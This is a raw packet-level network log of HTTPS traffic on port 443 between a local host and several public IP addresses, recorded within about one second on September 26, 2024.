Sep 26, 2024 17:55:30.005211115 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.007585049 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.007632017 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.007641077 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.009989977 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.010031939 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.010040045 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.010607004 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.010656118 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.010699987 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.010706902 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.011116982 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.011151075 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.011172056 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.011176109 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.011236906 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.012370110 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.012402058 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.012417078 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.012425900 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.012463093 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.014592886 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.016747952 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.016819954 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.016860962 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.016866922 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.017247915 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.017280102 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.017309904 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.017319918 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.017371893 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.017931938 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.018115044 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.018148899 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.018174887 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.018178940 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.018191099 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.018218040 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.018536091 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.018587112 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.018593073 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.018784046 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.018857956 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.018894911 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.018909931 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.018918037 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.018954992 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.018964052 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.019448042 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.021497011 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.021528006 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.021549940 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.021558046 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.021599054 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.023499012 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.023547888 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.023557901 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.023864985 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.024004936 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.024053097 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.024060011 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.024259090 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.024302006 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.024307966 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.024346113 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.024384975 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.024391890 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.025576115 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.025602102 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.025662899 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.025870085 CEST	49777	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.025881052 CEST	443	49777	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.026180983 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.026211023 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.026237011 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.026245117 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.026287079 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.026392937 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.026505947 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.026552916 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.026773930 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.026786089 CEST	443	49768	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.026793957 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.026829004 CEST	49768	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.028430939 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.029459000 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.029515028 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.029520988 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.030342102 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.030392885 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.030399084 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.030625105 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.030668974 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.030675888 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.030774117 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.030805111 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.030817032 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.030823946 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.030865908 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.033170938 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.035621881 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.035672903 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.035681009 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.036777020 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.036864996 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.036870956 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.037511110 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.037569046 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.037576914 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.038093090 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.038163900 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.038172007 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.040155888 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.040220022 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.040226936 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.044565916 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.044639111 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.044646025 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.044811964 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.044864893 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.044872999 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.046968937 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.047029018 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.047035933 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.049192905 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.049225092 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.049242973 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.049251080 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.049293041 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.049701929 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.049887896 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.049901009 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.050915003 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.050975084 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.051278114 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.051340103 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.051413059 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.051420927 CEST	443	49770	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.051436901 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.053925991 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.053977013 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.053985119 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.055886030 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.055917978 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.055938005 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.055946112 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.055984974 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.058094978 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.060091972 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.060165882 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.060173988 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.062566996 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.062601089 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.062621117 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.062627077 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.062666893 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.064230919 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.066404104 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.066447020 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.066483974 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.066490889 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.066535950 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.068588972 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.070578098 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.070610046 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.070636034 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.070645094 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.070693970 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.074158907 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.079783916 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.079823971 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.079838037 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.079854012 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.079894066 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.081190109 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.082401991 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.082406998 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.084207058 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.084732056 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.084794998 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.084800959 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.084811926 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.084872007 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.086689949 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.088293076 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.088326931 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.088340044 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.088349104 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.088413954 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.090049028 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.091922045 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.091952085 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.091979980 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.091986895 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.092031002 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.093533039 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.093580961 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.093628883 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.093636036 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.095535040 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.095593929 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.095602036 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.097100019 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.097174883 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.097182035 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.097245932 CEST	49770	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.098445892 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.098953962 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.098999977 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.099006891 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.100497007 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.100527048 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.100549936 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.100554943 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.100590944 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.100775003 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.100815058 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.100824118 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.103481054 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.103550911 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.103566885 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.104608059 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.104655027 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:30.104763031 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.104952097 CEST	49779	443	192.168.2.16	216.58.212.142
Sep 26, 2024 17:55:30.104964972 CEST	443	49779	216.58.212.142	192.168.2.16
Sep 26, 2024 17:55:30.106096029 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.106206894 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.106210947 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.106225014 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.106276989 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.106410027 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.106503010 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.106540918 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.106547117 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.106911898 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.106959105 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.106966019 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.107430935 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.108066082 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.108117104 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.108129025 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.108212948 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.108338118 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.108371973 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.108385086 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.108403921 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.108465910 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.110325098 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.110383987 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.110397100 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.111890078 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.111953974 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.111993074 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.112004042 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.112910986 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.112967014 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.112977028 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.113341093 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.113365889 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.113393068 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.113403082 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.113441944 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.115362883 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.115403891 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.115434885 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.115443945 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.115494013 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.115603924 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.115653038 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.115659952 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.117640972 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.118375063 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.118433952 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.118447065 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.121792078 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.121861935 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.121875048 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.125241995 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.125307083 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.125313997 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.125629902 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.128487110 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.128539085 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.128546000 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.131942034 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.132004023 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.132009983 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.132337093 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.133318901 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.133378983 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.133394003 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.133419991 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.133466959 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.134721041 CEST	49766	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.134733915 CEST	443	49766	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.137079000 CEST	49780	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:30.137113094 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:30.137212038 CEST	49780	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:30.137981892 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.138037920 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.138046980 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.142117023 CEST	49780	443	192.168.2.16	2.18.97.153
Sep 26, 2024 17:55:30.142128944 CEST	443	49780	2.18.97.153	192.168.2.16
Sep 26, 2024 17:55:30.142385006 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.142435074 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.142441988 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.145643950 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.145669937 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.145692110 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.145708084 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.145721912 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.145764112 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.145768881 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.145817995 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.145950079 CEST	49782	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.145960093 CEST	443	49782	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.146157026 CEST	49762	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.146167040 CEST	443	49762	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.146965981 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.147017002 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.147023916 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.155478001 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.155549049 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.155572891 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.157983065 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.158056021 CEST	49760	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:30.158066988 CEST	443	49760	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:30.158827066 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.158865929 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.158921003 CEST	49767	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:30.158927917 CEST	443	49767	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:30.158968925 CEST	49767	443	192.168.2.16	172.217.16.132
